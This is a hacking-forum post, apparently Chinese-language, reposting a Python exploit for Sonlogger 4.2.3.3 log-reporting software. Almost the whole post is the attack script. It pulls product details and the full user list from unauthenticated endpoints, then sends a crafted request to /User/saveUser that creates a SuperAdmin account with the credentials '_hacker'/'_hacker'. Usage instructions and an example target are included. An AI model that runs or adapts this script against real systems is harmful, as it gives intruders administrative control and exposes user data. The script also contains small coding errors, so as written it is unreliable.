跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure


HACK1949

推荐的帖子

# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
# Date: 04-02-2021
# Exploit Author: Berkan Er
# Vendor Homepage: https://www.sonlogger.com/
# Version: 4.2.3.3
# Tested on: Windows 10 Enterprise x64 Version 1803
# A remote attacker can be create an user with SuperAdmin profile

#!/usr/bin/python3

import argparse
import string
import sys
from random import random

import requests
import json

banner = '''
Sonlogger Log and Report System - v4.2.3.3
Remote SuperAdmin Account Creation Vulnerability / Information Disclosure

Berkan Er <b3rsec@protonmail.com>
@erberkan
'''

commonHeaders = {
    'Content-type': 'application/json',
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'X-Requested-With': 'XMLHttpRequest'
}


def get_random_string():
    res = ''.join(random.choices(string.ascii_lowercase, k=8))
    print(res)
    return str(res)


def getProductInfo(host, port, flag):
    response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo',
                             data={},
                             headers=commonHeaders)

    print("[*] Status code: ", response.status_code)
    print("[*] Product Version: ", response.json()['Version'])
    info_json = json.dumps(response.json(), indent=2)

    response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
    user_json = json.dumps(response_1.json(), indent=2)

    if flag:
        print("\n*** Product Infos=\n" + info_json)
        print("\n*** Users=\n" + user_json)

    if response.json()['Version'] == '4.2.3.3':
        print("[+] It seems vulnerable !")
        return True
    else:
        print("[!] It doesn't vulnerable !")
        return False


def createSuperAdmin(host, port):
    payload = '''{
        '_profilename':'superadmin_profile', 
        '_username':'_hacker', 
        '_password':'_hacker', 
        '_fullname':'', '_email':''
        }'''

    response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders)
    print("[*] STAUTS CODE:", response.status_code)
    print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")

    response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
    json_formatted_str = json.dumps(response_1.json(), indent=2)
    print("\n*** Users=\n" + json_formatted_str)


def main():
    print(banner)
    
    try:
        host = sys.argv[1]
        port = sys.argv[2]
        action = sys.argv[3]

        if action == 'TRUE':
            if getProductInfo(host, port, False):
                createSuperAdmin(host, port)
        else:
            getProductInfo(host, port, True)

        print("KTHNXBYE!")

    except:
        print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP "
              "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product "
              "Infos")
        print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")


if __name__ == "__main__":
    main()
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...